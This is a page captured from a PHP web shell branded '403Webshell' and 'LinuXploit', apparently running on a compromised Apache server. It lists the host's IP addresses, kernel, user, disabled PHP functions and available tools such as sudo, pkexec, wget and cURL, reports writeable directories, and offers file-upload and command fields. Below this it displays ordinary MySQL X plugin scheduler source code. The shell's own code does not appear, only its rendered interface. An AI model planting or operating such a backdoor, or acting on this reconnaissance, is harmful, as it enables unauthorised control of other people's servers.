403Webshell
Server IP : 172.67.216.182  /  Your IP : 104.23.175.188
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/mysql/src/rapid/plugin/x/ngs/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/mysql/src/rapid/plugin/x/ngs/src/scheduler.cc
/*
 * Copyright (c) 2015, 2023, Oracle and/or its affiliates.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License, version 2.0,
 * as published by the Free Software Foundation.
 *
 * This program is also distributed with certain software (including
 * but not limited to OpenSSL) that is licensed under separate terms,
 * as designated in a particular file or component or in included license
 * documentation.  The authors of MySQL hereby grant you an additional
 * permission to link the program and your derivative works with the
 * separately licensed software that they have included with MySQL.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License, version 2.0, for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
 * 02110-1301  USA
 */

#include "ngs_common/bind.h"
#include "ngs/scheduler.h"
#include "ngs/memory.h"
#include "ngs/log.h"

#include "my_rdtsc.h"


using namespace ngs;


const uint64_t MILLI_TO_NANO = 1000000;
const ulonglong TIME_VALUE_NOT_VALID = 0;

Scheduler_dynamic::Scheduler_dynamic(const char* name, PSI_thread_key thread_key)
: m_name(name),
  m_worker_pending_mutex(KEY_mutex_x_scheduler_dynamic_worker_pending),
  m_worker_pending_cond(KEY_cond_x_scheduler_dynamic_worker_pending),
  m_thread_exit_mutex(KEY_mutex_x_scheduler_dynamic_thread_exit),
  m_thread_exit_cond(KEY_cond_x_scheduler_dynamic_thread_exit),
  m_is_running(0),
  m_min_workers_count(1),
  m_workers_count(0),
  m_tasks_count(0),
  m_idle_worker_timeout(60 * 1000),
  m_thread_key(thread_key)
{
}


Scheduler_dynamic::~Scheduler_dynamic()
{
  stop();
}


void Scheduler_dynamic::launch()
{
  int32 int_0 = 0;
  if (m_is_running.compare_exchange_strong(int_0, 1))
  {
    create_min_num_workers();
    log_info("Scheduler \"%s\" started.", m_name.c_str());
  }
}


void Scheduler_dynamic::create_min_num_workers()
{
  Mutex_lock lock(m_worker_pending_mutex);

  while (is_running() &&
         m_workers_count.load() < m_min_workers_count.load())
  {
    create_thread();
  }
}


unsigned int Scheduler_dynamic::set_num_workers(unsigned int n)
{
  log_debug("Scheduler '%s', set number of threads to %u", m_name.c_str(), n);
  m_min_workers_count.store(n);
  try
  {
    create_min_num_workers();
  }
  catch (std::exception &e)
  {
    log_debug("Exception in set minimal number of workers \"%s\"", e.what());
    const int32 m = m_workers_count.load();
    log_warning("Unable to set minimal number of workers to %u; actual value is %i", n, m);
    m_min_workers_count.store(m);
    return m;
  }
  return n;
}


void Scheduler_dynamic::set_idle_worker_timeout(unsigned long long milliseconds)
{
  m_idle_worker_timeout.store(milliseconds);
  m_worker_pending_cond.broadcast(m_worker_pending_mutex);
}


void Scheduler_dynamic::stop()
{
  int32 int_1 = 1;
  if (m_is_running.compare_exchange_strong(int_1, 0))
  {
    while (m_tasks.empty() == false)
    {
      Task* task = NULL;

      if (m_tasks.pop(task))
        ngs::free_object(task);
    }

    m_worker_pending_cond.broadcast(m_worker_pending_mutex);

    {
      Mutex_lock lock(m_thread_exit_mutex);
      while (m_workers_count.load())
        m_thread_exit_cond.wait(m_thread_exit_mutex);
    }

    Thread_t thread;
    while(m_threads.pop(thread))
    {
      ngs::thread_join(&thread, NULL);
    }

    log_info("Scheduler \"%s\" stopped.", m_name.c_str());
  }
}


// NOTE: Scheduler takes ownership of the task and deletes it after
//       completion with delete operator.
bool Scheduler_dynamic::post(Task* task)
{
  if (is_running() == false || task == NULL)
    return false;

  {
    Mutex_lock lock(m_worker_pending_mutex);

    log_debug("Scheduler '%s', post task", m_name.c_str());

    if (increase_tasks_count() >= m_workers_count.load())
    {
      try { create_thread(); }
      catch (std::exception &e)
      {
        log_error("Exception in post: %s", e.what());
        decrease_tasks_count();
        return false;
      }
    }
  }

  while (m_tasks.push(task) == false) {}
  m_worker_pending_cond.signal(m_worker_pending_mutex);

  return true;
}


bool Scheduler_dynamic::post(const Task& task)
{
  Task *copy_task = ngs::allocate_object<Task>(task);

  if (post(copy_task))
    return true;

  ngs::free_object(copy_task);

  return false;
}


bool Scheduler_dynamic::post_and_wait(const Task& task_to_be_posted)
{
  Wait_for_signal future;

  {
    ngs::Scheduler_dynamic::Task task = ngs::bind(&Wait_for_signal::Signal_when_done::execute,
            ngs::allocate_shared<ngs::Wait_for_signal::Signal_when_done>(ngs::ref(future), task_to_be_posted));

    if (!post(task))
    {
      log_error("Internal error scheduling task");
      return false;
    }
  }

  future.wait();

  return true;
}


// NOTE: Scheduler takes ownership of monitor.
void Scheduler_dynamic::set_monitor(Monitor_interface *monitor)
{
  m_monitor.reset(monitor);
}


void *Scheduler_dynamic::worker_proxy(void *data)
{
  return reinterpret_cast<Scheduler_dynamic*>(data)->worker();
}

void Scheduler_dynamic::thread_end()
{
#ifdef HAVE_PSI_THREAD_INTERFACE
  PSI_THREAD_CALL(delete_current_thread)();
#endif
}

bool Scheduler_dynamic::wait_if_idle_then_delete_worker(ulonglong &thread_waiting_started)
{
  Mutex_lock lock(m_worker_pending_mutex);

  if (TIME_VALUE_NOT_VALID == thread_waiting_started)
  {
    thread_waiting_started = my_timer_milliseconds();
  }

  if (!is_running())
    return false;

  if (!m_tasks.empty())
    return false;

  const int64 thread_waiting_for_delta_ms = my_timer_milliseconds() - thread_waiting_started;


  if (thread_waiting_for_delta_ms < m_idle_worker_timeout)
  {
    // Some implementations may signal a condition variable without
    // any reason. We need to write the time when the thread went to idle state
    // state and monitor it!
    const int result = m_worker_pending_cond.timed_wait(m_worker_pending_mutex,
                                       (m_idle_worker_timeout - thread_waiting_for_delta_ms) *
                                       MILLI_TO_NANO);

    const bool timeout = ETIMEDOUT == result || ETIME == result;

    if (!timeout)
      return false;
  }
  else
  {
    // Lets invalidate the timeout, if the thread won't die
    // in next iteration then we should reinitialize the start-of-idle value
    thread_waiting_started = TIME_VALUE_NOT_VALID;
  }

  if (m_workers_count.load() > m_min_workers_count.load())
  {
    decrease_workers_count();
    return true;
  }

  return false;
}

void *Scheduler_dynamic::worker()
{
  bool worker_active = true;
  if (thread_init())
  {
    ulonglong thread_waiting_time = TIME_VALUE_NOT_VALID;
    while (is_running())
    {
      bool task_available = false;

      try
      {
        Task *task = NULL;

        while (is_running() &&
               m_tasks.empty() == false && task_available == false)
        {
          task_available = m_tasks.pop(task);
        }

        if (task_available && task)
        {
          ngs::Memory_instrumented<Task>::Unique_ptr task_ptr(task);
          thread_waiting_time = TIME_VALUE_NOT_VALID;

          (*task_ptr)();
        }
      }
      catch (std::exception &e)
      {
        log_error("Exception in event loop:\"%s\": %s",
                  m_name.c_str(), e.what());
      }

      if (task_available)
      {
        decrease_tasks_count();
      }
      else
      {
        if (wait_if_idle_then_delete_worker(thread_waiting_time))
        {
          worker_active = false;

          break;
        }
      }
    }
    thread_end();
  }

  {
    Mutex_lock lock_exit(m_thread_exit_mutex);
    Mutex_lock lock_workers(m_worker_pending_mutex);
    if (worker_active)
      decrease_workers_count();
    m_thread_exit_cond.signal();
  }

  m_terminating_workers.push(my_thread_self());

  return NULL;
}

void Scheduler_dynamic::join_terminating_workers()
{
  my_thread_t tid;
  while (m_terminating_workers.pop(tid))
  {
    Thread_t thread;
    if (m_threads.remove_if(thread, ngs::bind(Scheduler_dynamic::thread_id_matches, ngs::placeholders::_1, tid)))
    {
      ngs::thread_join(&thread, NULL);
    }
  }
}

void Scheduler_dynamic::create_thread()
{
  if (is_running())
  {
    Thread_t thread;
    log_debug("Scheduler '%s', create threads", m_name.c_str());

    ngs::thread_create(m_thread_key, &thread, worker_proxy, this);
    increase_workers_count();
    m_threads.push(thread);
  }
}

bool Scheduler_dynamic::is_running()
{
  return m_is_running.load() != 0;
}


int32 Scheduler_dynamic::increase_workers_count()
{
  if (m_monitor)
    m_monitor->on_worker_thread_create();

  return ++m_workers_count;
}


int32 Scheduler_dynamic::decrease_workers_count()
{
  if (m_monitor)
    m_monitor->on_worker_thread_destroy();

  return --m_workers_count;
}


int32 Scheduler_dynamic::increase_tasks_count()
{
  if (m_monitor)
    m_monitor->on_task_start();

  return ++m_tasks_count;
}


int32 Scheduler_dynamic::decrease_tasks_count()
{
  if (m_monitor)
    m_monitor->on_task_end();

  return --m_tasks_count;
}

Youez - 2016 - github.com/yon3zu
LinuXploit